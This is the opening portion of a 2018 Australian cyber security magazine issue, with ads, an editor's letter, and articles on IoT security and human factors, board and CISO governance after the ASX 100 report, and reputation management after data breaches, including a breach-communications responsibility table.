THE MAGAZINE FOR AUSTRALIAN INFORMATION SECURITY PROFESSIONALS | www.australiancybersecuritymagazine.com.au
@AustCyberSecMag Issue 4, 2018
Protect your reputation after a breach Cryptocurrency Insecurity Ethereum Blockchain Identity Management Can we take people out of IoT Security?
Breach notification isn’t just about breach notification Spectre and Meltdown Hybrid Forensics Who is the most offensive tester in the room?
DATA BREACH M EM B ER F O C U S E D
INNO VATE
HOW ARE YOU MANAGING YOUR CYBER RISK? Attend the most comprehensive cyber conference in Australia! Participate in business tracks free of technical language, hear from international thought leaders in cyber and engage in workshops and training to equip you with a better understanding of how you can manage this risk.
Register now at cyberconference.com.au From only $275 Save up to $825 on conference fees by becoming an AISA member today and access the many benefits received by our membership network
OCT 9-11
2018
AUSTRALIAN CYBER CONFERENCE
BROUGHT TO YOU BY
aisa.org.au
Contents
Editor's Desk 5 Feedback loop - have your say! Editor Tony Campbell Director & Executive Editor Chris Cubbage Director David Matrai
Helping Australia build a secure healthcare network
Art Director Stefan Babij
MARKETING AND ADVERTISING T | +61 8 6465 4732 promoteme@australiancybersecuritymagazine.com.au
Spectre and Meltdown
8
Can We Take People Out of Internet of Things Security
10
The ASX 100 Cyber Health Check Report
21
Protecting your reputation
16
Spectre and Meltdown
22
XSSposing bugs via Shockwave Flash analysis
30
Moving to Silicon Valley
32
Fortinet’s security transformation plans
34
Hybrid forensics
38
Who is the most offensive tester In the room
42
Now what? I have to notify the OAIC?
44
AISA member focus 46
SUBSCRIPTIONS FOR AUSTRALIAN SECURITY MAGAZINE
Executive Editor’s interview (Extract) with David Kemp,
52
T | +61 8 6465 4732 subscriptions@australiansecuritymagazine.com.au
Breach notification isn’t just about breach notification
54
Everything you need to know about breach notifications
56
Copyright © 2017 - My Security Media Pty Ltd 286 Alexander Drive, Dianella, WA 6059, Australia T | +61 8 6465 4732 E | myteam@mysecuritymedia.com www.mysecuritymedia.com
Cryptocurrency Insecurity
58
How India is coping with cyberthreats?
62
SMART ID: Ethereum blockchain identity management
64
Cyber Insurance - A Buyer's Guide Part 3
66
All Material appearing in Australian Security Magazine is copyright. Reproduction in whole or part is not permitted without permission in writing from the publisher. The views of contributors are not necessarily those of the publisher. Professional advice should be sought before applying the information to particular circumstances.
Who is the most offensive tester In the room
CONNECT WITH US www.facebook.com/apsmagazine SMART ID: Ethereum blockchain identity management
@AustCyberSecMag www.linkedin.com/groups/Asia-PacificSecurity-Magazine-3378566/about
Like us on Facebook and follow us on Twitter and LinkedIn. We post about new issue releases, feature interviews, events and other topical discussions.
Correspondents* & Contributors
www.youtube.com/user/MySecurityAustralia
Dan Lohrmann
Micheal Trovato
Wayne Tufek
Elliot Dellys
Jason Magic
Graeme Speak
David StaffordGaffney
Samantha Humphries
Guillaume Noé
www.australiansecuritymagazine.com.au
www.asiapacificsecuritymagazine.com
www.aseantechsec.com
www.drasticnews.com
|
Mark Luckin
Richard Adams
James Wooton
Annu Singh
Mark Jones
Sarosh Bana*
www.chiefit.me
|
www.youtube.com/user/ MySecurityAustralia
www.cctvbuyersguide.com
Editor's Desk
W
elcome to Issue 4 of the Australian Cyber Security Magazine. It’s hard to believe that we are already into April – Christmas seems like it was yesterday. Cyber security has again been in the headlines over the past few months – let’s face it, these days it’s rarely not in the news – with several largescale incidents, such as the one that affected Equifax, capturing much media attention. Globally, ransomware still dominates our incident response efforts, but the rise of cryptomining (more on that later) has become a modern irritation, where stealing CPU and GPU cycles – and electricity – is the new scourge affecting businesses and home users alike. Here in Australia, we’ve seen the introduction of new cyber security legislation mandating certain kinds of data breaches that relate to personally identifiable information (PII) must now be notified to all affected customers and the Office of the Australian Information Commission (OAIC). This new legislation is vague and is causing concern amongst the business community, since it’s often hard to determine what’s included and what is not, and what constitutes a reportable breach. Following on from the last issue, we have gathered together some more articles containing practical advice and guidance on mandatory breach notification, to help you understand what you need to do in advance, to prepare for such an incident. We had feedback last year that we didn’t have enough technical security articles, so we’ve taken that advice on board and included deeper investigations into forensics, malware analysis and a technical analysis of Shockwave Flash. We’re privileged to hear from Richard Adams, who explains hybrid forensics, an approach designed to address the problems of dealing with massive data volumes and large networks, and regular author, Guillaume Noé, walks us through the issues faced by investors looking to get in on the cryptocurrency gold rush. It’s funny when we look at the latest threat faced by businesses, insomuch that it’s a wonder this hasn’t happened before. Cryptomining is the unauthorised installation of cryptocurrency mining applications either on a website, where the activity runs as illicit script in the browser, or rogue system administrators are installing cryptomining software on the systems they look after, to steal processing time and electricity from their places of work to mine for bitcoin (or any number of other alternative currencies). We decided to commission some blockchain articles for this issue, since it’s such a hot topic now and has a connection to cyber security
in that the underlying technology is a public key infrastructure model of distributed trust. Cryptocurrencies are the primary application focused on by the public and media today, however, the blockchain ecosystem has unfathomable application in the real world, not restricted to currency and moving financial value from one party to another. Annu Singh’s article, Smart ID: Ethereum Blockchain Identity Management, looks at how Smart ID running on the blockchain ecosystem known as Ethereum offers a viable option for individuals, corporations and governments, for introducing efficiencies into the process lifecycle of identity management. Prime examples are in land sales and electronic passports, so Annu explain how this works and enlightens us on how wide the applicability of this new technology really is. James Wooton, one of Sydney’s most experienced penetration testers, talks us through the decision-making process for hiring testers, while Mark Luckin runs through several interesting scenarios relating to cyber insurance payouts in the third instalment of his series on cyber insurance. Finally, Graeme Speak, CEO of Australian cyber start-up BankVault, talks about his journey to Silicon Valley and explains why he’s relocated offshore to further build his business. This is a fascinating story and has a few hard lessons for those trying to encourage start-ups to stay at home. We hope you enjoy this issue of the ACSM and as usual, we welcome your comments, suggestions and requests for things you’d like us to cover in the future. Until next time, stay vigilant and keep yourself cyber-safe. Tony Campbell EDITOR
WRITE FOR US! The Australian Cyber Security Magazine is seeking enthusiastic cyber security professionals who are keen on writing for our magazine on any of the following topics: • • • • • • • • •
Reac h over out to 10 indu ,000 profe stry s per msionals onth !
Digital forensics in Australia Workforce development Security in the development lifecycle Threat management and threat hunting Incident management Operational security Security book reviews Risk management True crime (cybercrime)
If you are interested in writing for us, please send your article pitches (no more than 200 words) to the editors’ desk at: editor@australiancybersecuritymagazine.com.au
Interested in Blogging? You may or may not be familiar with our website, which also provides daily infosec news reviews, as well as our weekly newsletters. We’d like to hear from anyone who’d be interested in contributing blog posts for our platform that reaches out over 10,000 industry 6 | Australian Cyber Security Magazine
professionals per month, where you can express your opinions, preferences, or simply rant about the state of the cyber security world. If you stay on topic and stick to the facts, we’ll be happy to publish you. If interested, email the editors at : editor@australiancybersecuritymagazine.com.au
FEEDBACK LOOP - Have Your Say! There are many ways that you can provide feedback to us and
single one of you and publish the best discussion pieces in each
converse with our editorial board, but we’re establishing this
issue in this new standing section, entitled Feedback Loop.
regular feature in the Australian Cyber Security Magazine because
To thank you for your feedback, we’ll provide a token of
conversations can change the world. It is encouraging to see that
our appreciation for the best letter in every issue. As this is the
so many of you are already so vocal on some of the big issues
inaugural issue we don’t have any feedback yet, so let’s cut to the
affecting Australia, voicing your opinions on LinkedIn, blogs and
chase. The prize for the best letter in issue 4 will be a complete set
at industry conferences. We will endeavour to respond to every
of social engineering guru, Chris Hadnagy’s three amazing books.
Phishing Dark Waters: The Offensive and Defensive Sides of Malicious Emails An essential anti-phishing desk reference for anyone with an email address. Phishing Dark Waters addresses the growing and continuing scourge of phishing emails, and provides actionable defensive techniques and tools to help you steer clear of malicious emails. Phishing is analysed from the viewpoint of human decision-making and the impact of deliberate influence and manipulation on the recipient. With expert guidance, this book provides insight into the financial, corporate espionage, nation state, and identity theft goals of the attackers, and teaches you how to spot a spoofed e-mail or cloned website. Included are detailed examples of high profile breaches at Target, RSA, Coca Cola, and the AP, as well as an examination of sample scams including the Nigerian 419, financial themes, and post high-profile event attacks. Learn how to protect yourself and your organization using anti-phishing tools, and how to create your own phish to use as part of a security awareness program.
Unmasking the Social Engineer: The Human Element of Security The Human Element of Security focuses on combining the science of understanding non-verbal communications with the knowledge of how social engineers, scam artists, and con men use these skills to build feelings of trust and rapport in their targets. The author helps listeners understand how to identify and detect social engineers and scammers by analysing their non-verbal behaviour. Unmasking the Social Engineer shows how attacks work, explains nonverbal communications, and demonstrates with visuals the connection of non-verbal behaviour to social engineering and scamming.
Social Engineering: The Art of Human Hacking The first book to reveal and dissect the technical aspect of many social engineering manoeuvres. From elicitation, pretexting, influence and manipulation all aspects of social engineering are picked apart, discussed and explained by using real world examples, personal experience and the science behind them to unravelled the mystery in social engineering.
Australian Cyber Security Magazine | 7
25 – 27 JULY 2018
SECURING INNOVATION The 2018 Security Exhibition + Conference: Powered by ingenuity and invention, showcasing the latest technology and cutting edge thinking. From physical and electronic solutions, to biometrics and cyber security. Australia’s largest security event offers three days of business networking and intelligence sharing. Take a first-hand look at what’s next for the security environment including intelligence on managing threats and identifying risks.
MELBOURNE CONVENTION + EXHIBITION CENTRE EXHIBITION IS FREE REGISTER NOW securityexpo.com.au
#security2018
8 | Australian Cyber Security Magazine
INTRODUCING OUR MEDIA CHANNELS Bringing all of the MSM channels together on one platform for the latest and greatest in security, technology and events from across the Asia Pacific and the world. Now available on Apple and Android platforms.
Technology channel partner ecosystem platform with a natural focus on Big Data, Internet of Things and fast emerging technologies
Dedicated channel for all things about Drones, Robotics, Autonomous systems, Technology, Information and Communications
Your one-stop shop for all things CCTV, surveillance and detection technologies
The region’s newest government and corporate Technology and Security magazine, with a focus on the Southeast Asia region and the 10 ASEAN member nations
Commenced in November 2017, the Cyber Security Weekly Podcast has surpassed 30 interviews and provides regularly updates, news, trends and events. Available via Apple & Android
E TUN IN ! NOW
Australian Cyber Security Magazine | 9
Cyber Security
Can we take people out of IoT security?
H By Dan Lohrmann
ow can we provide better security for Internet of Things (IoT) devices? Yevgeny Dibrov writes that cybersecurity can be improved solely with technology improvements. I disagree. Here’s why I believe removing people from IoT security is ‘mission impossible.’ I recently read an intriguing Harvard Business Review (HBR.org) article by Yevgeny Dibrov, titled: The Internet of Things is Going to Change Everything About Cybersecurity. This well-written and thought-provoking opinion piece begins with the reality that cyber threats are exploding globally and data breaches have led mainstream businesses to spend over $93 billion in 2017 on stopping cybercrime. Furthermore, cyberattacks against Internet of Things (IoT) devices are skyrocketing even faster, causing Congress to get involved. Gartner anticipates that a third of hacker attacks will target "shadow IT" and IoT by 2020. In our scary new normal online, I certainly agree with Dibrov that: “Executives who are preparing to handle future cybersecurity challenges with the same mindset and tools that they’ve been using all along are setting themselves up for continued failure.” No doubt, old methods of defending enterprises from cyberattacks are failing and new security solutions are certainly needed. So, what is the author’s solution?
10 | Australian Cyber Security Magazine
Answer: Take people out of the security equation. Dibrov writes: “It can’t be denied, however, that in the age of increased social-engineering attacks and unmanaged device usage, reliance on a human-based strategy is questionable at best… It only took one click on a link that led to the download of malware strains like WannaCry and Petya to set off cascading, global cybersecurity events. This alone should be taken as absolute proof that humans will always represent the soft underbelly of corporate defenses. …” The article goes on to explain that the “Amazon Echo is susceptible to airborne attacks,” and “Users may have productivity goals in mind, but there is simply no way you can rely on employees to use them within acceptable security guidelines. IoT training and awareness programs certainly will not do anything to help, so what’s the answer? It is time to relieve your people (employees, partners, customers, etc.) of the cybersecurity burden.” My Response: Wrong answer. While I certainly agree that humans are often the weakest link in online security and we must do better at equipping staff, relieving your people from the cybersecurity burden is going in the wrong direction. People use the technology, and their actions, and the processes that are followed, will always be essential
Cyber Security
potential number of mistakes that can be made by end users. However, pitting effective security awareness training and/or a positive security culture against better technology is a serious mistake and ultimately leads down a path to dismal failure. History has taught us that lasting security answers must include “all of the above,” with people, process and technology working together well.
A Short History Lesson Regarding Cybersecurity
components of effective security strategies with the myriad new Internet of Things devices. The conventional wisdom remains true that solutions must involve people, process and technology answers. As I have written in the past, most experts say the largest percentage of our security challenges involve user actions (or interactions). Nevertheless, I am willing to concede that the percentage breakdown assigned to each category is open to debate and may be different for various products, services, companies and/or IoT devices. But before I explain in more detail why I part ways with respected CEO and co-founder of Armis, I want to say that I certainly agree that we need much better security built into IoT devices. I certainly think IoT security is at the cutting edge of cyber issues, and I share Dibrov’s sceptical view that we can keep doing the same things and get different results — in all three categories. Without hesitation, almost everyone except criminal hackers would love to have IoT devices ship “secure by default” or “secure by design” with a hack-proof seal of approval on every IoT box that ships. There is no doubt that much more needs be done with the security built into all technology, and it would be great if we could drastically reduce IoT security flaws and the
As I ponder these concepts and especially promises of more IoT security built-in up front, I can’t help but think back more than a decade to the Bill Gates promise of better security. Here’s a very brief history reminder from the days of Microsoft’s Trustworthy Computing. On Jan. 23, 2003, Bill Gates wrote these well-known "Secure by Design" words: “Secure by Default: In the past, a product feature was typically enabled by default if there was any possibility that a customer might want to use it. Today, we are closely examining when to pre-configure products as "locked down," meaning that the most secure options are the default settings. For example, in the forthcoming Windows Server 2003, services such as Content Indexing Service, Messenger and NetDDE will be turned off by default. In Office XP, macros are turned off by default. VBScript is turned off by default in Office XP SP1. And Internet Explorer frame display is disabled in the "restricted sites" zone, which reduces the opportunity for the frames mechanism in HTML email to be used as an attack vector. …” While I applauded these laudable goals more than a decade ago along with other important steps taken by Microsoft to improve security, the sad truth is that many hundreds of "Patch Tuesdays" have come and gone, with more hacked systems than ever before in 2017. The promise of “secure by default” is far from reality across the technology industry software, hardware and even cloudhosted services. Beyond Microsoft, other companies have the same issues with technology bugs and security holes that hackers eventually find. Even when technology products ship with all security settings enabled, which is not the case with many IoT devices, end users often turn off security features or fail to download critical security updates or don’t follow recommended practices such as changing default passwords. Yevgeny Dibrov is not the first one to suggest that technology can be made secure regardless of people’s actions, and he won’t be the last. However, I am somewhat surprised that this viewpoint remains popular as we head into 2018. Why? Beyond software development flaws, we have witnessed decades of insider threats caused by people like Edward Snowden and others who were able to use processes and weaknesses in people to overcome sophisticated data protections. There is simply no way that IoT manufacturers will spend the kind of dollars on security that the National Security Agency (NSA) spends on technology to protect
Australian Cyber Security Magazine | 11
Cyber Security
national secrets. And yet, even those technology defenses were able to be defeated by social engineering weaknesses exploited by Snowden — such as colleagues giving away their passwords. External hackers use those same techniques today, as demonstrated at security conferences like RSA. Recent cyberattacks against bitcoin exchanges represent another example of how attacks will go after weaknesses in people and process, despite solid technology which is supposedly "hack-proof." Just last week a South Korean bitcoin exchange declared bankruptcy after the second attack in less than a year. This situation developed after commentators still maintain that the bitcoin currency cannot be hacked. Perhaps true, but your bitcoin wallet can still be raided. Similar problems will continue to occur with IoT devices in the future.
Fun Movie and TV Examples to Help Understand the Role of People in Security I want to recognize that Dibrov says: “It may be prudent, and required, for you to continue with awareness programs, but you will have to rely more on intelligent technologies and automation if you hope to have any chance at success. …” I certainly agree. Nevertheless, the reality is that the main point of his article comes from the last sentence at the end of the article: “It’s time to remove people from the discussion and move towards a more intelligent, secure future.” Really? Take people out of the security discussion? Side note: I immediately posted this article to my LinkedIn and Twitter feeds and received a flood of similar comments to what I am writing in this rebuttal. Some of those same comments from colleagues appear at the bottom of the article at HBR.org. Furthermore, to keep this simple, I’d like to offer a fun illustration of why people cannot be removed from the central security discussion. In the (fictional) film series Mission Impossible, the most sophisticated technical security controls are consistently overcome via weaknesses exploited in people and process hacks. Ethan Hunt (played by Tom Cruise) and a wide assortment of men and women spies in the fictional U.S. Impossible Mission Force (IMF), face an untold number of highly improbable and dangerous tasks that are actionpacked, over-the-top and fun to watch. One common theme throughout these five movies (with number six coming in 2018) is how people can still defeat the most sophisticated technology safeguards put in place. Sadly, hackers overcoming state-of-the-art technology defenses are not just for the movies or TV shows like Mr. Robot. We have seen an untold number of ways that IoT devices can be hacked by tricking people into doing things or not following recommended best practices for security. Sadly, hacking IoT devices is often easier than Tom Cruise pulling off one of his movie stunts. Everyone certainly agrees with the goal to build moresecure IoT devices. Humans certainly make mistakes, and we should aim to automate as much security as possible. Just as we safely fly planes on autopilot, shouldn’t we strive
12 | Australian Cyber Security Magazine
to build human-proof smart devices that are secure out of the box? Of course. And ... I am all for more-secure IoT devices that remove the potential for most end-user errors or security mistakes. Nevertheless, training and working with people and processes to protect data will never be an optional extra for secure enterprises, homes or individuals.
A False Choice The HBR article by Yevgeny Dibrov appears to offer an attractive answer because it promises IoT security solutions without the very hard to change enterprise security culture. It offers a false hope by eliminating “reliance on a human-based strategy” and offering better security with a perfect technology-driven, or bolt-on tech solution, for all IoT devices. Managers imagine saving significant money by reducing the time required for staff to be trained and/ or understand and implement appropriate (and secure) business processes with innovative technology. This invented conflict is similar to another security paradox from a few years back that asked the question: Are data breaches inevitable? Most people now say "yes" without hesitation, but Invincea CEO Anup Ghosh told Washington news site DC Inno that breach prevention is possible, proclaiming “breach inevitability” is just marketing. As I wrote at that time, we need a third answer that adopts all the wisdom contained in the NIST Cybersecurity Framework regarding cyber incident and data breach prevention as well as incident response. The same holistic approach is required for IoT security. Let’s not sacrifice one security best practice in exchange for another, as if we need to pick technology protections over enabling people with better awareness training and engaging in cyber exercises. The NIST guidance encourages an assessment of all cyber-risks with prioritization based upon your specific situation. It recommends that solutions contain end-user training, technical training for developers and system administrators, cybersecurity exercises, management briefings, repeatable technology upgrade processes and much more. Don’t skip over important sections of the NIST Cyber Framework.
Final Thoughts Better cybersecurity protections for IoT requires improvements in people, process and technology. So, let’s not pit people issues against technology protections in a fight for dollars — nor pretend that a perfect black box is coming that will enable IoT nirvana, while removing people and process from the security equation. Bottom line: The Edward Snowden story can teach many important security lessons. But no security message is more central than this: People, and their actions, will always matter in cybersecurity. So, can we remove people from the IoT security discussion? Mission Impossible!
Cyber Security
The ASX 100 Cyber Health Check Report. What’s next for your board - PART II
S
hortly after the release of the ASX 100 Cyber Health Check Report, I wrote about the next steps for boards. Although the arc of progress described in the ASX Report is tilted towards goodness, it is also clear much needs to be done. At that time, I recommended:
By Micheal Trovato
1. 2.
3. 4.
5.
Make sure the board has sufficient cyber security expertise or advisors; Encourage your Chief Information Security Officer to build governance skills in finance, risk, strategy, legal, and compliance; Use the results of the ASX Report for discussion at your next board meeting; Commence or update your organisation’s detailed cyber security strategy and report on the security transformation program regularly; Include cyber security as a quarterly agenda item, or
more often as needed; 6. Measure your board’s performance in this critical area; and 7. Learn from peers on other boards. Last time I focused on experience and expertise of the board. Most importantly, expertise at a board level comes from knowing the “that, how, and why” of cyber security and having the right practical experience. This implies having an experienced cyber security person on the board, audit and risk committee, or as an advisor to the board. In this article, I want to focus on the Chief Information Security Officer’s experience and the board. Many organisation are putting well qualified cyber security skilled people in CISO or CISO-light roles and then expecting them to be well rounded and be able to interact with boards or their committees. Regrettably,
Australian Cyber Security Magazine | 13
Cyber Security
"They recommend that organisations start with the question, “What level of CISO do you have?” and ask yourself what is the current organisational attitude towards cyber. Then assess the current role/person against the CALM Model and determine what level CISO the organisation has." these CISOs function with a lot of day-to-day stress, in roles that are within organisations that have values and cultural misalignments, without sufficient mandate from the executive or board, and without resources to execute effectively. All this in an environment that is so fraught with danger, that any CISO should sign on only with a 6-12-month redundancy package. Why? After a breach, the organisation may feel it necessary to make a statement to stakeholders that it is doing something, even if it is not the fault of the CISO. Their jobs are in jeopardy daily and the gap between the board understanding and experience with privacy and cyber security compounds the difficulty of communicating and working with the CISO.
The ASX 100 Cyber Health Check Report, as a baseline – where is the CISO? The ASX Report says that it “can act as a baseline where companies can see how they rate against their peers and can take practical steps to improve their cyber security.” Further, in the report, cyber security is often the domain of theoard’s audit or risk committees (64% of respondents), allowing a subset of directors with relevant skills to focus on cyber risk. Considering the maturity of cyber security governance in Australia, this is the result I would expect and those committees are probably the most qualified to evaluate cyber risk. The ASX Report did not go to the next level – looking at the most senior cyber executive – and while the board’s job may stop at hiring the CEO and then the CEO hires the CISO, there was not a view as to the CISO’s capabilities. This was a disappointment, as this person is critical to the organisation.
It depends on your CISO’s capabilities and strategic industry focus… While retained search firm Russel Reynold’s (RR) carried out
14 | Australian Cyber Security Magazine
cyber search assignments, they realised that while there had been considerable progress on defining standards and approaches for dealing with cyber security, including the widely adopted US NIST cyber security framework, there was little clarity on understanding what “good” looked like, in the leadership of the cyber security function. Cyber security is a pervasive risk and an arcane, deep, and fast-moving area of knowledge, and CISOs are expected to understand the “that” and the “how”, as well as the “why” of cyber security. But many struggle to communicate and work with business leaders and boards and give the benefit of their experience, hampered by their lack of similar board experience or soft skills.
Russell Reynolds CISO Assessment Level Model (CALM) http://www.russellreynolds.com/insights/thought-leadership/ cyber-security-the-ciso-assessment-level-model-calm Russell Reynolds developed a CALM Model that shows four levels of CISO: Level 1 (the lowest level) represents about 60% of the market and Level 4 represents less than 100 people worldwide, most of whom are in the US. Level 1’s are mostly existing heads of IT security and are largely focused on governance and controls. Level 4’s are deeply intimate with their businesses; they are involved in the background, in senior hirings and firings, M&A, divestments, supply chain, IP protection and anything shareholder sensitive. They also have regular sessions with the chairman of the main board and train non-executives. They recommend that organisations start with the question, “What level of CISO do you have?” and ask yourself what is the current organisational attitude towards cyber. Then assess the current role/person against the CALM Model and determine what level CISO the organisation has. Then ask where the organisation wants to get to, and over what period does it want to get there? Then work out what approach is currently taken to cyber risk management in the organisation. You now have a good view on how sophisticated the organisation currently is in its thinking and approach to cyber security. Next, look at the table that focuses on what a CISO does. Work your way down the table through some of the observations and see if you can figure out either what the current capability of the CISO is, or what the future requirement will be. You now have a more refined view of what level of CISO is most likely to succeed in the organisation going forward.
Is that enough? While organisations continue to evolve these roles, sometimes upgrading the role a couple of times over years as part of the process, they often neglect the well roundness of the role. I’ve had the benefit of working in the industry for 10 years and 20+ years in “Big 4” firms as a consulting partner in the US and Australia. As part of my career journey, I earned an MBA in Accounting and Finance and BS in Management Science, Computing, and
Cyber Security
Psychology. And along the way, I had multiple opportunities to gain experience in governance and risk at the board and executive level – building the financial, legal, strategy, and risk skills as well as the ability to analyse, synthesise and communicate. Many CISOs, due to their technology and operations career paths, have not had this experience – but it is critical that they be willing to step away from some of the technical aspects of information security, while keeping up-to-date with technical knowledge and certifications, and learn business language, softer communication and presentation skills. Some suggested key activities: 1.
Read the AFR, Wall Street Journal, or FT – or other business publications that build business knowledge and learn to speak the language of business and understand today’s issues. 2. Increase education and training in business – an MBA being a good choice. 3. Do a stint in a consulting firm – while many people may find this a big leap, the experience gained is invaluable. 4. Graduate from the Company Directors Course from the Australian Institute of Company Directors (AICD) or similar in your geography. 5. Join ISACA or ISC2 and obtain certifications like CISM or CISSP to demonstrate credentialed trust, risk, and governance skills and leverage your technical skills – regulators may soon require this.
6. Join non-profit boards and gain the experience of being on boards – ideally doing something that you love to do – you may even discover a new career. 7. Develop relationships with executives so they are aware of your knowledge and skills, will begin to trust you, and will see you as a good choice for an executive position. That last item offers an interesting side-bar. Boards need to get comfortable with two things: 1.
That the potential cyber security skilled board members or CISOs are not a danger. Let’s face it - with the level of leaking going on and the high-profile debacles caused by possibly well intentioned, but questionable individuals and values – should they trust us? In the end they will need to, and it will be to their advantage – but being able to empathise and understand what a board must do to vet candidates is critical. 2. They must understand how we will bring value. This will be difficult if they can’t see a person that can contribute through all areas of the board competence – not just with respect to cyber security expertise. For most boards today, they are outgunned by cyber criminals. Getting the right knowledge and experience integrated into the board and CISO will be essential to achieve the desired outcomes of organisational resilience. There is much work still to be done.
CivSec 2018 CyberSecurity Magazine.qxp_CivSec2018 CyberSecurity Magazine 22/03/2018 2:14 PM Page 1
CYBER SECURITY TO PROTECT THE NATION AND SOCIETY
CivSec 2018 CIVIL SECURITY CONGRESS AND EXPOSITION
1-3 MAY 2018 MELBOURNE Learn how government and industry will preserve security, safety and sovereignty for the Indo-Asia-Pacific against conventional and cyber threats now and in the future. Hear:
See: l l l l l
Cyber security careers forum Industry and technology exhibition Innovation showcase High level strategic summits Specialist conferences and symposia
Admission is Free
BE OUR GUEST!
l l l l l
DPMC Deputy Secretary Cyber Security, Alastair MacGibbon AFP Cyber Crime Ops Manager, Commander David McLean Telstra GM Cyber Operations, Grant McKechnie AustCyber CEO, Craig Davies Oceania Cyber Security Centre, Professor Chris Leckie
www.civsec.com.au
Registration is Essential
DON’T MISS IT!
Australian Cyber Security Magazine | 15
Cyber Security
Protect your reputation after a breach
D By Wayne Tufek
ata breaches expose everything from government identifiers to user account log-in names and passwords. Criminals can use the stolen information such as name, address and date of birth, to file false tax returns, order credit cards and to take money from bank accounts. If you use the internet and have provided your personal details, you’re most likely a victim of at least one data breach. Data breaches are inevitable and waiting for a breach to occur before designing and testing an incident response plan is a recipe for failure. It’s now a question of when your organisation will be breached and how you will respond, not if you will be breached. 100% prevention simply doesn’t exist, so having a plan to deal with a security breach is now more important than ever. You probably already have an incident response plan, from a technical perspective with defined phrases such as preparation, identification, containment, eradication and lessons learned. Given the severe reputational damage that can arise from a high-profile data breach, a marketing and communications plan, along with a technical response plan, is now a necessity. Security heads must now learn about public relations and crisis management, as the changing facets of information security force the role to move from a technologist to a business leader and risk manager. As the role changes, you must now consider in
16 | Australian Cyber Security Magazine
the event of a breach what is required for communication to your customers, regulators, shareholders and to the general public. What will be communicated, how it will be communicated and what will be done to remedy the situation, must all be communicated quickly and across multiple mediums to the right audience. Honesty, transparency and accepting accountability are key to successfully saving your organisations reputation in the court of public opinion. Breaches are inevitable, but data theft is not. Remember, focusing on all five elements of a comprehensive security program: identify, protect, detect, respond and recover, will provide full circle protection and allow you to manage your risk. In AON’s 2015 Global Risk Management Survey (http:// www.aon.com/2015GlobalRisk/) the number 1 risk that keeps senior managers and risk leaders awake is “damage to reputation and brand”. Interestingly enough, at number 7 was “business interruption” and at number 9 was “computer crime/hacking/viruses/malicious codes”. An information security breach can certainly give rise to the number 1, 7 and 9 of the top ten risks. Whilst every incident that becomes a crisis must be handled in a different way, there is one factor common to all crises, and that is communication. How communications are handled with your stakeholders is critical in protecting your organisations
Cyber Security
Ordinarily, information security professionals have not had to think too much about public safety, but as more and more smart devices become connected to physical infrastructure, cyberattacks will have an increasing and potentially devastating impact on the physical world.
reputation. How an incident is communicated can either significantly help or hurt how affected customers, employees and shareholders view the company. A crisis in itself can create three types of threats, a threat to public safety, a financial loss to the organisation and/or a loss of reputation. Ordinarily, information security professionals have not had to think too much about public safety, but as more and more smart devices become connected to physical infrastructure, cyber-attacks will have an increasing and potentially devastating impact on the physical world. Some industries will see this before others, such as transport management systems, vehicles (think driver-less cars) and hospitals. What is inevitable is the convergence of physical security and information security. Physical security is concerned with the safety and preservation of life and now it will be part of the purview of the information security professional. A failure in information security may result in the loss of human life, as information security professionals we can no longer consider security to be just about the confidentiality, integrity and availability of information. In early 2016, law firm Mossack Fonseca experienced a huge data breach. Eleven million documents were leaked revealing the details of how the rich and famous use tax havens to hide their wealth. The fallout from the breach
included the resignation of the Prime Minister of Iceland, for not declaring ownership of a substantial company shareholding. If you needed tax advice would you go to Mossack Fonseca? I’m thinking you wouldn’t. Loss or damage to an organisations reputation is the number one risk that keeps senior business managers awake at night. Reputation and brand are closely related, but are different, even though the terms are sometimes used interchangeably. Brand is owned by an organisation. It is the organisations promise to its people; it is what the organisation would like its stakeholders to believe is true. Reputation on the other hand is owned by the organisations stakeholders, it is their collective perception of what they believe to be true. An organisations reputation strengthens its brand, but brand does not greatly influence reputation. A data breach in a worst-case scenario will turn into a crisis. When responding to security incidents, often it’s a case of Murphy’s Law – “what can go wrong, will go wrong, in the worst possible way”. In this type of situation, it is important to protect your organisations reputation by communicating the right message, to the right people at the right time. A key part of crisis management is to have a plan and update it annually. Have a designated team were each member has defined responsibilities. Test the plan annually, this is very important, if you’ve never tested your plan, how do you know that it works? How will the people involved in responding to the incident know what to do if they haven’t had a chance to practice? The table on the following page provides you with some help in determining and assigning tasks and explaining who will do what part of the communications data breach response. It should be used as a guide and tailored to your individual organisation as required. Each of the actions is explained below: • Advises: This individual or group provides input into the steps to be completed or the process to be performed. • Owner: The individual or group that administers, oversees or manages the process, function or steps. • Implements: The individual or group that performs the function, steps or actions in accordance with the owners wishes. • Updates: This party receives updates on status and
Australian Cyber Security Magazine | 17
Cyber Security
Activity
CMO
CEO
Comms Manager
CIO
CFO
COO
CISO
Legal Counsel
CHRO
Form the team
Owner/ Implements
Updates
Updates
Updates
Updates
Updates
Updates
Updates
Updates
Determine incident facts and current status
Updates
Updates
Updates
Owner
Updates
Updates
Implements
Updates
Updates
Obtain outside PR/ comms assistance
Advises
Updates
Owner/ Implements
Updates
Updates
Updates
Updates
Updates
Updates
Obtain outside IR assistance
Updates
Updates
Updates
Updates
Updates
Updates
Owner/ Implements
Updates
Updates
Prepare communications
Advises
Advises
Owner/ Implements
Advises
Advises
Advises
Advises
Advises
Advises
Approve communications
Advises
Owner
Advices
Advises
Advises
Advises
Advises
Advises
Advises
Notify OAIC?
Advises
Advises
Advises
Advices
Advises
Advises
Advises
Owner
Updates
Issue communications via channels
Updates
Updates
Owner/ Implements
Updates
Updates
Updates
Updates
Updates
Updates
Monitor social media and stakeholder reactions
Updates
Updates
Owner/ Implements
Updates
Updates
Updates
Updates
Updates
Updates
progress from the Owner.
Advises: This individual or group provides input into the steps to be completed or the process to be performed. Owner: The individual or group that administers, oversees or manages the process, function or steps. Implements: The individual or group that performs the function, steps or actions in accordance with the owners wishes. Updates: This party receives updates on status and progress from the Owner.
